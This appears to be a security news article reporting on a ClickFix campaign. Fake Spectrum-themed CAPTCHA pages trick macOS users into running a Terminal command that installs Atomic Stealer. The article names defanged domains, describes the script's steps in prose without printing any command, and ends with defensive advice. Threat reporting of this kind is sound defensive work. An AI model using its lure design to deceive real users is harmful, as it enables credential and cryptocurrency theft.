New Malware Campaign Targets macOS Users with Atomic Stealer Using ClickFix Tactic

Cybersecurity researchers have uncovered a new malware campaign targeting Apple macOS users with a technique known as ClickFix, which tricks victims into executing malicious code manually. The goal is to install Atomic macOS Stealer (AMOS)—a powerful malware capable of harvesting sensitive data such as system passwords, browser credentials, and cryptocurrency wallet information.

How the Campaign Works

According to CloudSEK, the campaign begins on typosquatted domains impersonating U.S. telecom provider Spectrum (e.g., panel-spectrum[.]net, spectrum-ticket[.]net). When users visit the fake website, they are shown a bogus hCaptcha page that urges them to prove they’re not a robot.

After clicking the “I am human” checkbox, a fake error message appears stating that CAPTCHA verification failed. It then presents an "Alternative Verification" method, instructing the user to copy a command and run it in the macOS Terminal. This command downloads and executes a malicious shell script.

What the Script Does

• Prompts for the user’s system password under the guise of verification

• Bypasses security mechanisms using native macOS commands

• Downloads and installs Atomic Stealer (AMOS)

• Begins exfiltrating credentials, browser data, and wallet info

Interestingly, the malware code includes Russian-language comments, suggesting the involvement of Russian-speaking developers.

Indicators of a Hastily Built Campaign

The delivery infrastructure is described as poorly implemented:

• Linux users are provided PowerShell commands, which are incompatible with Linux

• Both Windows and macOS users are instructed to "Press & hold the Windows Key + R"

• Mismatched user-agent detection and platform instructions

These inconsistencies do not impact the malware’s effectiveness but demonstrate sloppiness in execution.

Broader ClickFix Use and Variants

ClickFix has become a popular vector for delivering malware across multiple platforms. It has been seen distributing:

• XWorm RAT

• PureLogs Stealer

• DanaBot

• NetSupport RAT

Threat actors use fake CAPTCHA and consent banners as bait, sometimes embedded within real, compromised websites. These deceptive prompts lead users to copy/paste malicious commands under the guise of verifying access or accepting cookies.

What You Can Do

To defend against these threats:

• Users should never execute scripts or commands prompted by websites.

• Organizations should educate staff about these tactics and monitor Terminal or PowerShell usage patterns.

• Security teams should flag any unknown scripts executing from user directories or triggered by browser activity.

As Daniel Kelley of SlashNext put it, “Attackers exploit ‘verification fatigue,’ knowing users are conditioned to click through CAPTCHA prompts quickly.” This tactic capitalizes on routine behavior to bypass security defenses.

Conclusion

This campaign shows how attackers are evolving beyond simple phishing to manipulate human behavior in more sophisticated ways. By disguising malware delivery as routine security verification, threat actors effectively bypass defenses—reminding us that social engineering remains one of the most potent tools in the cybercriminal playbook.